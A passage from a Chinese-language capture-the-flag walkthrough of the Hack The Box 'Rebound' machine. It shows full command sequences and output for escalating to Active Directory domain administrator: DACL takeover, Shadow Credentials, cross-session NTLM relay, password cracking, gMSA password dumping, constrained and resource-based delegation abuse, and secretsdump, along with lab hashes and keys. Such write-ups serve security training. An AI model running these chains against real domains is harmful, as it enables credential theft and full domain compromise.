PV > Add-DomainGroupMember -Identity servicemgmt -Members oorend
[2024-04-06 04:25:11] User oorend successfully added to servicemgmt

Descendant Object Takeover

将自己添加到ServiceMgmt之后,现在在服务用户OU上拥有了GenericAll(也称为FullControl)。这允许将FullControl特权扩展到属于该OU的每个对象。在这种情况下,这些对象是winrm_svc和batch_runner:

为了执行攻击,使用dacledit.py,它也被打包到之前安装的Impacket的分支中。

使用-inheritance标志,重写并扩展了当前的特权到子对象:

1
2
3
4
5
6
7
8
9
(impacket-fork) [root@kali ~ ]$ dacledit.py rebound.htb/oorend:'1GR8t@$$4u' -k -dc-ip 10.10.11.231 -action write -rights FullControl -inheritance -principal oorend -target-dn "OU=Service Users,DC=rebound,DC=htb" -use-ldaps
/root/impacket-fork/bin/dacledit.py:4: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  __import__('pkg_resources').run_script('impacket==0.10.1.dev1+20231106.134307.9aa93730', 'dacledit.py')
Impacket for Exegol - v0.10.1.dev1+20231106.134307.9aa93730 - Copyright 2022 Fortra - forked by ThePorgs

[-] CCache file is not found. Skipping...
[*] NB: objects with adminCount=1 will no inherit ACEs from their parent container/OU
[*] DACL backed up to dacledit-20240406-043124.bak
[*] DACL modified successfully!

  • 注意: 如果在这个阶段出现INSUFF_ACCESS_RIGHTS错误,请确保将oorend重新添加到ServiceMgmt组,因为该bxo的清理任务可能已经重置。

检查winrm_svc或batch_runner对powerview的权限,看到oorend现在对两个对象都有FullControl (GenericAll):

1
2
3
4
5
6
7
8
9
10
(LDAPS)-[dc01.rebound.htb]-[rebound\oorend]
PV > Get-ObjectAcl -Identity winrm_svc -Where "SecurityIdentifier contains oorend"
ObjectDN                    : CN=winrm_svc,OU=Service Users,DC=rebound,DC=htb
ObjectSID                   : S-1-5-21-4078382237-1492182817-2568127209-7684
ACEType                     : ACCESS_ALLOWED_ACE
ACEFlags                    : CONTAINER_INHERIT_ACE, INHERITED_ACE, OBJECT_INHERIT_ACE
ActiveDirectoryRights       : FullControl
AccessMask                  : 0xf01ff
InheritanceType             : None
SecurityIdentifier          : oorend (S-1-5-21-4078382237-1492182817-2568127209-7682)

使用FullControl权限,然后对winrm_svc执行ShadowCredentials攻击,因为这个名称暗示可能能够使用该帐户来恶意winrm连接到box中。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
λ ~/hackthebox/machine/rebound/ certipy-ad shadow auto -u oorend@rebound.htb -p '1GR8t@$$4u' -account winrm_svc -target dc01.rebound.htb -dc-ip 10.10.11.231 -k
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Targeting user 'winrm_svc'
[*] Generating certificate
[*] Certificate generated
[*] Generating Key Credential
[*] Key Credential generated with DeviceID '9f14b32c-1290-2a13-ef11-ae83e76fe810'
[*] Adding Key Credential with device ID '9f14b32c-1290-2a13-ef11-ae83e76fe810' to the Key Credentials for 'winrm_svc'
[*] Successfully added Key Credential with device ID '9f14b32c-1290-2a13-ef11-ae83e76fe810' to the Key Credentials for 'winrm_svc'
[*] Authenticating as 'winrm_svc' with the certificate
[*] Using principal: winrm_svc@rebound.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'winrm_svc.ccache'
[*] Trying to retrieve NT hash for 'winrm_svc'
[*] Restoring the old Key Credentials for 'winrm_svc'
[*] Successfully restored the old Key Credentials for 'winrm_svc'
[*] NT hash for 'winrm_svc': 4469650fd892e98933b4536d2e86e512

检索到NT hash后,可以使用它来恶意入侵box。

1
evil-winrm -i dc01.rebound.htb -u winrm_svc -H 4469650fd892e98933b4536d2e86e512

cross-session relay

检查系统上运行的进程可以发现在session 1中运行的许多任务,这表明可能有另一个用户登录到该box中。

1
2
3
4
5
6
7
8
9
10
*Evil-WinRM* PS C:\Users\winrm_svc\Documents> ps
Handles NPM(K) PM(K) WS(K) CPU(s) Id SI ProcessName
------- ------ ----- ----- ------ -- -- -----------
385 32 12032 20824 2576 0 certsrv
462 18 2348 5588 392 0 csrss
267 16 1968 5168 516 1 csrss
361 15 3440 14940 5164 1 ctfmon
400 33 16388 25152 2652 0 dfsrs
158 8 1944 6356 2784 0 dfssvc
285 14 3992 13876 3756 0 dllhost

系统上经过身份验证的用户可以打开目标以进行cross-session攻击。为这个任务上传工具包,包括KrbRelayRunasCs

虽然RunasCs在其Github版本中有预编译的可执行文件,但KrbRelay没有。该项目必须下载并在Windows机器上编译,这超出了本文的范围。确保使用最新版本,其中包括NTLM cross-session支持。

使用RunAs,可以通过运行qwinsta来验证是否有人登录:

1
2
3
4
5
.\RunasCs.exe oorend '1GR8t@$$4u' -l 9 "qwinsta"

 SESSIONNAME       USERNAME                 ID  STATE   TYPE        DEVICE
>services                                    0  Disc
 console           tbrady                    1  Active

使用runa和KrbRelay的组合,可以强制来自tbrady的连接,这将生成hash。

为此,通过-ntlm指定NTLM身份验证,通过-session指定session号,并为具有正确权限的有效RPC服务指定CLSID,从README上列出的默认值中选择(在Cross-Session Relay下,适用于Windows Server 2019)。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
*Evil-WinRM* PS C:\Users\winrm_svc\Documents> ./RunasCs.exe oorend '1GR8t@$$4u' -
l 9 "c:\users\winrm_svc\documents\KrbRelay.exe -ntlm -session 1 -clsid 354ff91b-
5e49-4bdc-a8e6-1cb6c6877182 -port 10246"
[*] Auth Context: rebound\tbrady
[*] Rewriting function table
[*] Rewriting PEB
[*] GetModuleFileName: System
[*] Init com server
[*] GetModuleFileName: c:\users\winrm_svc\documents\KrbRelay.exe
[*] Register com server
objref:TUVPVwEAAAAAAAAAAAAAAMAAAAAAAABGgQIAAAAAAADb8QujUWpk7EXlFOjCHVuIAigAAGwb//87FS6QsIPIYCIADAAHADEAMgA3AC4AMAAuADAALgAxAAAAAAAJAP//AAAeAP//AAAQAP//AAAKAP//AAAWAP//AAAfAP//AAAOAP//AAAAAA==:

[*] Forcing cross-session authentication
[*] Using CLSID: 354ff91b-5e49-4bdc-a8e6-1cb6c6877182
[*] Spawning in session 1
[*] NTLM1
4e544c4d535350000100000097b208e2070007002c00000004000400280000000a0063450000000f444330315245424f554e44
[*] NTLM2
4e544c4d53535000020000000e000e003800000015c289e25976b5afd38af057000000000000000086008600460000000a0063450000000f7200650062006f0075006e00640002000e007200650062006f0075006e006400010008004400430030003100040016007200650062006f0075006e0064002e006800740062000300200064006300300031002e007200650062006f0075006e0064002e00680074006200050016007200650062006f0075006e0064002e0068007400620007000800b4a468ea5e87da010000000000000000000000005c00410070007000490044005c004b00507044400b7f0000
[*] AcceptSecurityContext: SEC_I_CONTINUE_NEEDED
[*] fContextReq: Delegate, MutualAuth, ReplayDetect, SequenceDetect, UseDceStyle, Connection, AllowNonUserLogons
[*] NTLM3
tbrady::rebound:5976b5afd38af057:781d933ebf471ba3a53f8fde38534ba5:0101000000000000b4a468ea5e87da01403a32a0d7d14b060000000002000e007200650062006f0075006e006400010008004400430030003100040016007200650062006f0075006e0064002e006800740062000300200064006300300031002e007200650062006f0075006e0064002e00680074006200050016007200650062006f0075006e0064002e0068007400620007000800b4a468ea5e87da0106000400060000000800300030000000000000000100000000200000324a7a4dc5cc35f66c25982fee19d22fd89b784aed0a551a1d262bb80a1919680a00100000000000000000000000000000000000090000000000000000000000
System.UnauthorizedAccessException: Access is denied. (Exception from HRESULT: 0x80070005 (E_ACCESSDENIED))
   at KrbRelay.IStandardActivator.StandardGetInstanceFromIStorage(COSERVERINFO pServerInfo, Guid& pclsidOverride, IntPtr punkOuter, CLSCTX dwClsCtx, IStorage pstg, Int32 dwCount, MULTI_QI[] pResults)
   at KrbRelay.Program.Main(String[] args)

虽然最终得到了一个错误,但获得了thbrady的NTLM3 hash,将其保存到一个文件中并提供给john。

1
2
3
john tbrady --wordlist=/usr/share/wordlists/rockyou.txt

543BOMBOMBUNmanda (tbrady)

通过枚举tbrady的权限,看到他在delegate$上拥有ReadGMSAPassword

组管理服务帐户(GMSA)涉及一种设置,其中Windows服务器通过为帐户创建复杂的随机密码来自主处理该帐户的密码。可以通过过滤delegate$的msDS-ManagedPassword属性来使用bloodyADdump它。

1
2
3
4
5
6
7
8
9
10
11
12
[root@kali:~/bloodyAD on main]
# python bloodyAD.py -d rebound.htb -u tbrady -p '543BOMBOMBUNmanda' --host dc01.rebound.htb get object 'delegator$' --resolve-sd --attr msDS-ManagedPassword

distinguishedName: CN=delegator,CN=Managed Service Accounts,DC=rebound,DC=htb
msDS-ManagedPassword.NTLM: aad3b435b51404eeaad3b435b51404ee:43e9069a73081ecfcbe1514e1d4e3bc8
msDS-ManagedPassword.B64ENCODED: tstzpYhnwwC1LuLjL0MtLrXzhLdDe8HPWCmR5BxwR5Gg87pPdmKYlhqMUh7njfqjzauLXDCp0Ofk7V+yfqCu0f5t+5zS/SmOw5wdqERpgl/uyd6LdKk/ZJYHAhifOVFWl4svHJ787reCRKbS+44rzi1DM4CcY/LLKAzHevGe3NkHww8vILZUU6cQNcKSyteGPRmxK2iq05EUs8ggGBwxAHwXCm24U8gdc19ILeL8YTtbUy/n5t+t7/DScrDHK8O1Suo6yPJXP37UaDsbIWJiqGNgcSLyWPgT6hEhLkODEjsBiqAgDAYTkrR6YZ1jlQGr6bSd9o70rSN6lPoRlfkDyQ==
[root@kali:~/bloodyAD on main]
# netexec ldap rebound.htb -u tbrady -p 543BOMBOMBUNmanda -k --gmsa
SMB         rebound.htb     445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:rebound.htb) (signing:True) (SMBv1:False)
LDAP        rebound.htb     636    DC01             [+] rebound.htb\tbrady:543BOMBOMBUNmanda
LDAP        rebound.htb     636    DC01             [*] Getting GMSA Passwords
LDAP        rebound.htb     636    DC01             Account: delegator$           NTLM: 43e9069a73081ecfcbe1514e1d4e3bc8

delegator$’s hash: 43e9069a73081ecfcbe1514e1d4e3bc8

Constrained Delegation (KCD) Abuse

攻击者可以利用Kerberos委托获得对重要资源的访问权,在某些情况下,甚至可以将其权限提升到域管理员的权限。两种特定形式的委托,约束委托和基于资源的约束委托(RBCD),都使用称为Service-for-User (S4U)的Kerberos扩展

虽然Bloodhound没有显示约束委托,但findDelegation.py显示delegator$实际上能够委托:

1
2
3
4
5
6
7
8
9
findDelegation.py rebound.htb/oorend:'1GR8t@$$4u' -dc-ip dc01.rebound.htb -k

[*] Getting machine hostname
[-] CCache file is not found. Skipping...
[-] CCache file is not found. Skipping...
AccountName  AccountType                          DelegationType                       DelegationRightsTo
-----------  -----------------------------------  -----------------------------------  ---------------------
DC01$        Computer                             Unconstrained                        N/A
delegator$   ms-DS-Group-Managed-Service-Account  Constrained w/o Protocol Transition  http/dc01.rebound.htb
  • 注意: 再一次,使用了之前安装的Impacket的ThePorgs分支。

没有protocol transition的委托意味着不可能用经典的”getST”来滥用它。尝试这样做会导致Kerberos错误:

1
2
3
4
5
6
7
8
getST.py rebound.htb/delegator\$ -hashes :43e9069a73081ecfcbe1514e1d4e3bc8 -dc-ip dc01.rebound.htb -spn http/dc01.rebound.htb -impersonate Administrator
[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating Administrator
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[-] Kerberos SessionError: KDC_ERR_BADOPTION(KDC cannot accommodate requested option)
[-] Probably SPN is not allowed to delegate by user delegator$ or initial TGT not forwardable

这是因为缺乏Protocol Transition,这意味着S4U2Self步骤不会产生可转发的票证,从而导致S4U2proxy步骤失败。

本质上,用户对自己的服务(S4U2self)协议使服务能够代表另一个用户请求服务票证,但用于自己的使用。相反,用户到代理服务(S4U2proxy)协议允许一个服务代表另一个用户请求服务票证,但是请求的是不同的服务。

可以通过执行S4U2Self并检查生成的票据来验证这一点。首先通过-self标志请求票证:

1
2
3
4
5
6
7
getST.py rebound.htb/delegator\$ -hashes :43e9069a73081ecfcbe1514e1d4e3bc8 -dc-ip dc01.rebound.htb -spn http/dc01.rebound.htb -impersonate Administrator -self
[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating Administrator
[*] When doing S4U2self only, argument -spn is ignored
[*] Requesting S4U2self
[*] Saving ticket in Administrator@delegator$@REBOUND.HTB.ccache

如果检查票证,看到可转发flag没有设置:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
describeTicket.py Administrator@delegator\$@REBOUND.HTB.ccache
[*] Number of credentials in cache: 1
[*] Parsing credential[0]:
[*] Ticket Session Key            : 997cb2bd199848c134a230582eed4046
[*] User Name                     : Administrator
[*] User Realm                    : rebound.htb
[*] Service Name                  : delegator$
[*] Service Realm                 : REBOUND.HTB
[*] Start Time                    : 05/04/2024 09:28:48 AM
[*] End Time                      : 05/04/2024 19:28:48 PM
[*] RenewTill                     : 06/04/2024 09:28:46 AM
[*] Flags                         : (0xa10000) renewable, pre_authent, enc_pa_rep
[*] KeyType                       : rc4_hmac
[*] Base64(key)                   : mXyyvRmYSME0ojBYLu1ARg==
[*] Kerberoast hash               : $krb5tgs$18$USER$REBOUND.HTB$*delegator$*$d18681bc307159d28a5dee77$7388dbaa197ffb2c1c1d8fd0f66364f10d54f413d38d3dc8d76ee15a5fdb14f368832fd07079a98621e71c5de8584afba4addd907407e91b47b5f972f16256e141a2902f4803b8df99e7d8713ea1026686e49402230b49657b52300b6b00e38c19a26f7054989a27bfee94a3622f60c60bf21f3440698689830991cc6743f4473ba341256d591b90f09f2a147db51c00fe30d5d71f2f1c26b206ca6dd1bc6c3f4d41c07ef872bbf6b8be34c811bb0dfde8de758fc257db360aa0cbcff89fd5b0b5bc7c62995e7725c87d3f9c9c87c7069d5b062ae171b545adbcf0bafea6433e52b7f24c6154e19728d71e72a9ea3c55eaa2091b4077ca4e194eac85bc5d1c1efda65dda0988d8c19d2df63641c0a170d196a01d66f6b911bf130265c0a89d59877f73a35f4a3ef417e4042c0dd47e1a7b9a75d5bc125e1501ab3a224ca5e6580f0940846a0cdc8bf68574ac5dac01efcaf937dabf57d65cf1399fd92909a5cb111e78ef4478cab989636d15fc07c04810c9b139f489331272b9155fc82b9c40a870e0076b688afbb08fb51277bed2279f71c62c97512ef56a090fd9149475e0184d3eb29ea33ce931067d84f570cd62dcfa3033dcf98aa9c8c59f3d412d11a962c69d8d9c9a488e3d4c118545e4f51d87906856632972362000b7d4ad71f8046c33e54f79db516c2e044fe79ed022dd649ae787c61931d8f549574200f127bdbfccf8f005316f2a71dac848df0a7e3571435341c014cb5b163e0e70e6de510858b0cf0341e535b3d9002fc06bea908cc8900cfa697f3b3c24aa765dd3b8b875a0d1a4b2c043943790ce88e4159c741b813ee504e044cda8cecdcb8557d09b6e6b9bb2179b83e12aa2e8f06abc9f7b237c9e77f232a40e7666731ebfaa6abf7152316df6437c718f654abe40f20c13252b579a791e7e0857e70c6919f41ae2678f93cab5b8fe472b14aff3a7cd3c8889e2b349a4831933d70ed202f4597bc8a00dfcc3d59b4eed91147b57fc732ebf62924139ec7312d4b5b5fe763d825fabf0a84ecd0ae297088ff4a9f9d8aa6879bd201f9d0cac32fc30c09016a5c3a34af261c3795adf847215f6ca4b454b4ff7b7e806d93880ffb443e8e3f51107527568c6248f0e759bf0a7c4ae614c1820c6125a709bede1d079b52f05d7f0456f825a4be8c8f6b62a6ce574b961297c945e736c564adeb8199c7bc9357e518851c6bac3a4e4322f1e3e6592d478b939189cc99b04170a62d5c867f3d0a5b506f0976b29b4aa30ef162e2dee75e4dd954f3913942ad182b73eebb929cbb65209ba53592f49a3024bab27df53f67310b8eef75acebcf26640206172b4681245f7ea1cc3b102c00dbed784ca31de4f172acb6ce5fe139c3c2e8f616583d25f7281cb008831cb1e3b6f02f7511ca3ec678fb8100425d0966a2f9a7d28ac9ecd5bdf52b3da64e90a86b95cabf1df30d7d61522fb1f5b663932275e91aa735975f445650b92cd58a16f1cd4f6e25420be34afd0a80a749419ccb720dc597de33812d188b0fa7a883766025e7f6e8ca032917404ca38b2de787fc348995cb4bade6881279672e475d3874851d9c07480914221fd57f102e2c6609edf799ce8eb19b81870326a58167515008dbdc7d6
[*] Decoding unencrypted data in credential[0]['ticket']:
[*]   Service Name                : delegator$
[*]   Service Realm               : REBOUND.HTB
[*]   Encryption type             : aes256_cts_hmac_sha1_96 (etype 18)
[-] Could not find the correct encryption key! Ticket is encrypted with aes256_cts_hmac_sha1_96 (etype 18), but no keys/creds were supplied

在这个阶段,仍然可以通过两种方式滥用受约束委托:

  1. 进行基于资源的受限委托(RBCD)攻击。
  2. 在运行Kerberos侦听器时,强制或等待用户对服务进行身份验证。

目前,前者似乎是更可行的选择。

Resource-Based Constrained Delegation RBCD

为了执行RBCD攻击,需要将另一个服务或用户附加到delegator$的msDS-AllowedToActOnBehalfOfOtherIdentity属性,允许其他服务委托给delegator$。

根据服务必须至少有一个SPN的constraint来选择服务,这导致选择ldap_monitor。为了使rbcd.py工作,需要修改/etc/hosts,在其他主机名之前添加dc01,如下所示:

1
10.10.11.231 dc01 dc01.rebound.htb rebound.htb

如果省略此更改,rbcd.py将返回[-]无效的服务器地址错误。

1
2
3
4
5
6
7
rbcd.py rebound.htb/delegator\$ -hashes :43e9069a73081ecfcbe1514e1d4e3bc8 -k -delegate-from ldap_monitor -delegate-to delegator$ -action write -dc-ip dc01 -use-ldaps
[-] CCache file is not found. Skipping...
[*] Attribute msDS-AllowedToActOnBehalfOfOtherIdentity is empty
[*] Delegation rights modified successfully!
[*] ldap_monitor can now impersonate users on delegator$ via S4U2Proxy
[*] Accounts allowed to act on behalf of other identity:
[*]     ldap_monitor   (S-1-5-21-4078382237-1492182817-2568127209-7681)

可以在powerview中验证这个属性是否被修改过:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
powerview rebound.htb/oorend:'1GR8t@$$4u'@dc01.rebound.htb -k
Get-DomainObject -Identity delegator$
objectClass                                  : top
                                               person
                                               organizationalPerson
                                               user
                                               computer
                                               msDS-GroupManagedServiceAccount
cn                                           : delegator
distinguishedName                            : CN=delegator,CN=Managed Service Accounts,DC=rebound,DC=htb
instanceType                                 : 4
whenCreated                                  : 20230408090831.0Z
whenChanged                                  : 20240405143632.0Z
uSNCreated                                   : 69353
uSNChanged                                   : 428294
name                                         : delegator
objectGUID                                   : {c9da97ae-5e35-44d2-aa15-114aecdc0caf}
userAccountControl                           : WORKSTATION_TRUST_ACCOUNT [4096]
badPwdCount                                  : 0
codePage                                     : 0
countryCode                                  : 0
badPasswordTime                              : 04/04/2024
lastLogoff                                   : 0
lastLogon                                    : 04/05/2024
localPolicyFlags                             : 0
pwdLastSet                                   : 04/02/2024
primaryGroupID                               : 515
objectSid                                    : S-1-5-21-4078382237-1492182817-2568127209-7687
accountExpires                               : 9223372036854775807
logonCount                                   : 107
sAMAccountName                               : delegator$
sAMAccountType                               : 805306369
dNSHostName                                  : gmsa.rebound.htb
servicePrincipalName                         : browser/dc01.rebound.htb
objectCategory                               : CN=ms-DS-Group-Managed-Service-Account,CN=Schema,CN=Configuration,DC=rebound,DC=htb
isCriticalSystemObject                       : FALSE
dSCorePropagationData                        : 16010101000000.0Z
lastLogonTimestamp                           : 133562535487307243
msDS-AllowedToDelegateTo                     : http/dc01.rebound.htb
msDS-SupportedEncryptionTypes                : RC4-HMAC
                                               AES128
                                               AES256
msDS-AllowedToActOnBehalfOfOtherIdentity     : AQAEgEAAAAAAAAAAAAAAABQAAAAEACwAAQAAAAAAJAD/AQ8AAQUAAAAAAAUVAAAAnSwX8yHn8FjpghKZAR4AAAECAAAAAAAFIAAAACACAAA=
msDS-ManagedPasswordId                       : AQAAAEtEU0sCAAAAagEAAAoAAAAGAAAAqozXLXGPzBuv4FrBregFhwAAAAAYAAAAGAAAAHIAZQBiAG8AdQBuAGQALgBoAHQAYgAAAHIAZQBiAG8AdQBuAGQALgBoAHQAYgAAAA==
msDS-ManagedPasswordPreviousId               : AQAAAEtEU0sCAAAAagEAAAcAAAAeAAAAqozXLXGPzBuv4FrBregFhwAAAAAYAAAAGAAAAHIAZQBiAG8AdQBuAGQALgBoAHQAYgAAAHIAZQBiAG8AdQBuAGQALgBoAHQAYgAAAA==
msDS-ManagedPasswordInterval                 : 30
msDS-GroupMSAMembership                      : AQAEgBQAAAAAAAAAAAAAACQAAAABAgAAAAAABSAAAAAgAgAABAAsAAEAAAAAACQA/wEPAAEFAAAAAAAFFQAAAJ0sF/Mh5/BY6YISmQYeAAA=

再次运行findDelegation.py也会显示更新后的条目:

1
2
3
4
5
6
7
8
9
findDelegation.py rebound.htb/oorend:'1GR8t@$$4u' -dc-ip dc01.rebound.htb -k
[*] Getting machine hostname
[-] CCache file is not found. Skipping...
[-] CCache file is not found. Skipping...
AccountName   AccountType                          DelegationType                       DelegationRightsTo
------------  -----------------------------------  -----------------------------------  ---------------------
DC01$         Computer                             Unconstrained                        N/A
ldap_monitor  Person                               Resource-Based Constrained           delegator$
delegator$    ms-DS-Group-Managed-Service-Account  Constrained w/o Protocol Transition  http/dc01.rebound.htb

现在已经准备好执行RBCD了。想法是,可以作为任何帐户从delegator$上的ldap_monitor请求票证,为delegator$上的模拟帐户创建一个可转发的ST。将模拟DC01$,因为Administrator被标记为敏感,不能委托:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
Get-DomainUser -Identity Administrator
cn                                : Administrator
description                       : Built-in account for administering the computer/domain
distinguishedName                 : CN=Administrator,CN=Users,DC=rebound,DC=htb
memberOf                          : CN=Group Policy Creator Owners,CN=Users,DC=rebound,DC=htb
                                    CN=Domain Admins,CN=Users,DC=rebound,DC=htb
                                    CN=Enterprise Admins,CN=Users,DC=rebound,DC=htb
                                    CN=Schema Admins,CN=Users,DC=rebound,DC=htb
                                    CN=Administrators,CN=Builtin,DC=rebound,DC=htb
name                              : Administrator
objectGUID                        : {37857665-6e2e-4f12-9976-5c9babcd8282}
userAccountControl                : NORMAL_ACCOUNT [1114624]
                                    DONT_EXPIRE_PASSWORD
                                    NOT_DELEGATED
badPwdCount                       : 1
badPasswordTime                   : 04/05/2024
lastLogoff                        : 0
lastLogon                         : 03/29/2024
pwdLastSet                        : 04/08/2023
primaryGroupID                    : 513
objectSid                         : S-1-5-21-4078382237-1492182817-2568127209-500
adminCount                        : 1
sAMAccountName                    : Administrator
sAMAccountType                    : 805306368
objectCategory                    : CN=Person,CN=Schema,CN=Configuration,DC=rebound,DC=htb

然后可以使用delegator$的受限特权将可转发的ST转发到DC,从而在DC上为DC01$创建一个ST。

首先,从delegator$上的ldap_monitor请求一个ST,模拟DC01$。

1
2
3
4
5
6
7
getST.py rebound.htb/ldap_monitor:'1GR8t@$$4u' -spn browser/dc01.rebound.htb -impersonate DC01$
[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating DC01$
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in DC01$@browser_dc01.rebound.htb@REBOUND.HTB.ccache

这允许通过提供刚刚生成的票证来跳过S4U2Self步骤,这是可转发的:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
describeTicket.py DC01\$@browser_dc01.rebound.htb@REBOUND.HTB.ccache
[*] Number of credentials in cache: 1
[*] Parsing credential[0]:
[*] Ticket Session Key            : 767d153d636e861400de859c0d561ba9
[*] User Name                     : DC01$
[*] User Realm                    : rebound.htb
[*] Service Name                  : browser/dc01.rebound.htb
[*] Service Realm                 : REBOUND.HTB
[*] Start Time                    : 05/04/2024 09:45:34 AM
[*] End Time                      : 05/04/2024 19:45:33 PM
[*] RenewTill                     : 06/04/2024 09:43:52 AM
[*] Flags                         : (0x40a10000) forwardable, renewable, pre_authent, enc_pa_rep
[*] KeyType                       : rc4_hmac
[*] Base64(key)                   : dn0VPWNuhhQA3oWcDVYbqQ==
[*] Kerberoast hash               : $krb5tgs$18$USER$REBOUND.HTB$*browser/dc01.rebound.htb*$8a9675ea512659235df48421$7458895533348641c64dc62d133e5e03b4884970efdc309d94bd69c6048ee1e41fc7223cbaa570d0dbaa677985115f8b10153b4e08f299f5e5625fbb8d280a8226ab6ec8aeec14a9cde49902c9441dfee71e0fc38bd342d8af61593edd951f1d9d05499e5c01bd3fbeab18cbdc7876a6a189fa7c853d944d6057312d52a53bbe294b2191211a247c198abd00bb95152f74b8b1488c343a381d28ced950705b379ada4cf2d433e87ecfc34dbc29026cc05042e81933a1221781064d17ffae974ac83038236a17cee8151eab2e11014a90deca09b7e05632d564728c489add0fc6f68b8bd0ab425e1f3a891d38f47e3bf61d07dc1a1e7211080b0ad1211eb5543455235dd9f01da926c249480fb8b195346cedba939a5ba9239f9f8c6d270524d6e5b1aad7aa8fb8488c75964ffc964098b60c212658725e85bea570c88396551e23e0af1f19f7042bfa38db3fb4f3ee87efca16931f7cdf05a5179d264b1d63addd312325d1012e2106d305aeecdc8e645eaa089890b37b0f44d615a547b0049bc2f4618e63ea9653437c5c18f16c115f106ef259d1800429d1302ccfef6c2392636a571789f83fd56596b776efbd784d0153beb770ae6eee1771fbb561c079803c5a56a0026946ecc88c730647df64968d65f6b91f6a096657e439e73c7145df53fc7e7ab8ead89ebdcf52952cd42f5e6a5496aaf3a1c3142ad719687769ec44de969223c94fe0990e9fe3f73e71fbd99cfff2f0a6c609a0a08c325ddbef586a1d4c88f5f648dcfe4390565f4ada6a13805152b247837cd2cac7adc98b1b4bd755829566896aea34e12f35ae6bd4f9ed29bc7849d998168e7a7ce3f67f6ba0ed6faf6a85c80e180234ef34d106ea7cdcdd45749849ada99ddc2e0e9584473cf69c785016d59df543965feaefaf254a621faa1a5dd4e8a397c1a70baae027c6e5d69bf934dd873566dbe6857b96450cae2a8e3ccdafa7d6550f3ebad667a3d1f4bd5a95729a817907d3246c34da60ff1ee54d31592e9e2c006feb485db8cde5ada3ef04dba13522409acbc835b2d66017f6366e27dfa487b1d15c634ef03446c7f0baf1b4e106161242c45704f026a1ed95207c6bdce5842d8ab9ab7606841a6c632140d4e543bf8d8a696d0960db0799ff19e4148294ef6d47be90c18d5c66fa69e69ea48390b73e2981d8d9146f5788c4d2bfe9ffb5498b75dcef923202fc8da417003280a27797ea0e5d6592cc0419f500df5cf6188d20be4b7d909ec3d137366da5ccc0d1a58b8a1a73bcdfc64d602ffa91d72c0438364ca56b195f8f5beed6f6f1720184ce553341b12cde0291eb24c6e8c5d96d186bbedcdff254673c3b4de709f3f6d3c27aabbb45c5779d223eb81e5b97fd7da406226d7012d5b1e350fe9f73b133dde5777efb7781b1b7759ccc8b8b3af0574d16ffd1a0ea0121973b3fd0129b07a0b4034163212242f5b429e9b562c4f9d6f69c91e1990701625d7afbc7624b70bc54d92040a9a02e0d5aab61abd85462a74624d35a25f1774df006705c7ffae4f8158f5c8a70e19b81f8b93ca2b9d0d50d193f462a80d1cc2cb6dd6f2efc96667ac1ce796e13ff721d7dd812efc9ec993fa99b2af0b7321fa4bc35ddc072caf2d2bf5aff6b9d2249490a2c97fbae72f66d4948f1aab10a15fc161a92e0a873136a1c581083c0b18c7cdbe8c13a2708e9f8f5e4f5bc389b9b808f98dcb25fdb80ca593049b6497819610cce55a755d568ab52253e563b7aa8e42dc4b5f659937188989582191a97652beff2eac4bf0bf5d064f1d29c2b662751ede388
[*] Decoding unencrypted data in credential[0]['ticket']:
[*]   Service Name                : browser/dc01.rebound.htb
[*]   Service Realm               : REBOUND.HTB
[*]   Encryption type             : aes256_cts_hmac_sha1_96 (etype 18)
[-] Could not find the correct encryption key! Ticket is encrypted with aes256_cts_hmac_sha1_96 (etype 18), but no keys/creds were supplied

完成攻击

1
2
3
4
5
6
7
getST.py rebound.htb/delegator\$ -hashes :43e9069a73081ecfcbe1514e1d4e3bc8 -spn http/dc01.rebound.htb -additional-ticket DC01\$@browser_dc01.rebound.htb@REBOUND.HTB.ccache -impersonate DC01$
[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating DC01$
[*]     Using additional ticket DC01$@browser_dc01.rebound.htb@REBOUND.HTB.ccache instead of S4U2Self
[*] Requesting S4U2Proxy
[*] Saving ticket in DC01$@http_dc01.rebound.htb@REBOUND.HTB.ccache

通过使用-additional-ticket flag指定可转发票据,将其直接提供给S4U2Proxy,这允许在域控制器上获得DC01$的ST。

最后,将票据提供给secretsdump.py,获得Administrator的hash。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
(impacket-fork) [root@kali ~ ]$ KRB5CCNAME=./DC01\$@http_dc01.rebound.htb@REBOUND.HTB.ccache secretsdump.py -k -no-pass dc01.rebound.htb -just-dc-user administrator
/root/impacket-fork/bin/secretsdump.py:4: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  __import__('pkg_resources').run_script('impacket==0.10.1.dev1+20231106.134307.9aa93730', 'secretsdump.py')
Impacket for Exegol - v0.10.1.dev1+20231106.134307.9aa93730 - Copyright 2022 Fortra - forked by ThePorgs

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:176be138594933bb67db3b2572fc91b8:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:32fd2c37d71def86d7687c95c62395ffcbeaf13045d1779d6c0b95b056d5adb1
Administrator:aes128-cts-hmac-sha1-96:efc20229b67e032cba60e05a6c21431f
Administrator:des-cbc-md5:ad8ac2a825fe1080
[*] Cleaning up...
